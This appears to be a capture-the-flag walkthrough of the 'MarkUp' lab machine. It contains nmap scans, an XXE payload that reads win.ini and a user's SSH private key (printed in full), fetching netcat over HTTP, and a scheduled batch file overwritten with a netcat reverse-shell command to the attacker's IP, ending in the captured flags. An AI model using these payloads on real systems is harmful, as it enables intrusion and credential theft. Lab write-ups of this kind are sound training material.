Table of Contents

MarkUp

For this box I am following the provided wirghtup

IP=10.129.23.18

myIP=10.10.15.113

nmap scans

nmap -sCV $IP -oN nmap-markup.txt

sudo nmap -sC -A -Pn $IP

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 9fa0f78cc6e2a4bd718768823e5db79f (RSA) | 256 907d96a96e9e4d4094e7bb55ebb30b97 (ECDSA) |_ 256 f910eb76d46d4f3e17f393d60b8c4b81 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) |http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28 |http-title: MegaShopping | http-cookie-flags: | /: | PHPSESSID: | httponly flag not set 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) | tls-alpn: | http/1.1 |_ssl-date: TLS randomness does not represent time |http-title: MegaShopping | http-cookie-flags: | /: | PHPSESSID: | httponly flag not set |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28 | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 75.99 ms 10.10.14.1 2 76.22 ms 10.129.23.18

Web Page

Defalted to login page tried U: admin P: password worked!

looking into the order page and will examin with burp to see what is hapinaing.

also ran gobuster dir -u http://$IP -w common.txt only /index.php was 200 most 403 or 503 with 2 301 -/images

when I try ^u it takes me to the code for index.php for all pages but using the inspecter I can find the we will try user Daniel

Burp

POST /process.php HTTP/1.1 Host: 10.129.23.18 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.129.23.18/services.php Content-Type: text/xml Content-Length: 121 Origin: http://10.129.23.18 DNT: 1 Connection: close Cookie: PHPSESSID=oc1pddf95a38lmus3jrn2pj155

<order>
    <quantity>
        1
    </quantity>
    <item>
        Home Appliances
    </item>
    <address>
        this is a test
    </address>
</order>

Lets Try XXE - XML External Entity lets edit

*<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>*
<order>
    <quantity>
        1
    </quantity>
    <item>
        *&test;*
    </item>
    <address>
        this is a test
    </address>
</order>

submit and get Your order for ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [Ports] COM1:=9600,n,8,1 has been processed

This shows that the win.init file was posted so we know it is vunlerable.

eddit the attack to

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>

response

Your order for -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----

now we make an ssh key

next try ssh

ssh

use the make file $ touch id_rsa $ gedit id_rsa past and save $ chmod 400 id_rsa $ ls -al id_rsa -r-------- 1 jmk jmk 2602 May 19 15:45 id_rsa then use it

$ ssh -i id_rsa daniel@$IP
daniel@MARKUP C:\Users\daniel>

move to desktop and find user.txt
daniel@MARKUP C:\Users\daniel\Desktop>type user.txt

032d2fc8952a8c24e39c8f0ee9918ef7

whoami /priv

PRIVILEGES INFORMATION

Privilege Name Description State ============================= ============================== ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

now moving on

daniel@MARKUP C:\Log-Management>type job.bat @echo off FOR /F “tokens=1,2” %%V IN (‘bcdedit’) DO SET adminTest=%%V IF (%adminTest%)==(Access) goto noAdmin for /F “tokens=” %%G in (‘wevtutil.exe el’) DO (call :do_clear “%%G”) echo. echo Event Logs have been cleared! goto theEnd :do_clear wevtutil.exe cl %1 goto :eof :noAdmin echo You must run this script as an Administrator! :theEnd exit

daniel@MARKUP C:\Log-Management>icacls job.bat job.bat BUILTIN\Users:(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

used powershell

PS C:\Log-Management> ps

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName

 72       5     2212       3800              3684   1 cmd
 87       6     3580       5000       0.06   3884   0 cmd

.. .. .. 361 22 9160 20984 1744 0 vmtoolsd 201 16 4760 13624 3972 1 vmtoolsd 84 5 928 4032 2456 1 wevtutil 170 11 1440 6840 496 0 wininit 257 12 2528 11308 580 1 winlogon 311 15 7468 16496 2976 0 WmiPrvSE

so we will now upload nc64.exe we get it from wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe then uses pyhon3 -m http.server

on the Markup box wget http://myIP:8000/nc64.exe -outfile nc64.exe

then add it to the wevtutil.exe by

echo C:\Log-Management\nc64.exe -e cmd.exe {your_IP} {port} > C:\Log-Management\job.bat echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.15.113 4444 > C:\Log-Management\job.bat

daniel@MARKUP C:\Log-Management>echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.15.113 4444 > C:\Log-Management\job.bat

then set nc -lvnp 4444

C:\Users\Administrator\Desktop> type root.txt type root.txt f574a3e7650cebd8c39784299cb570f8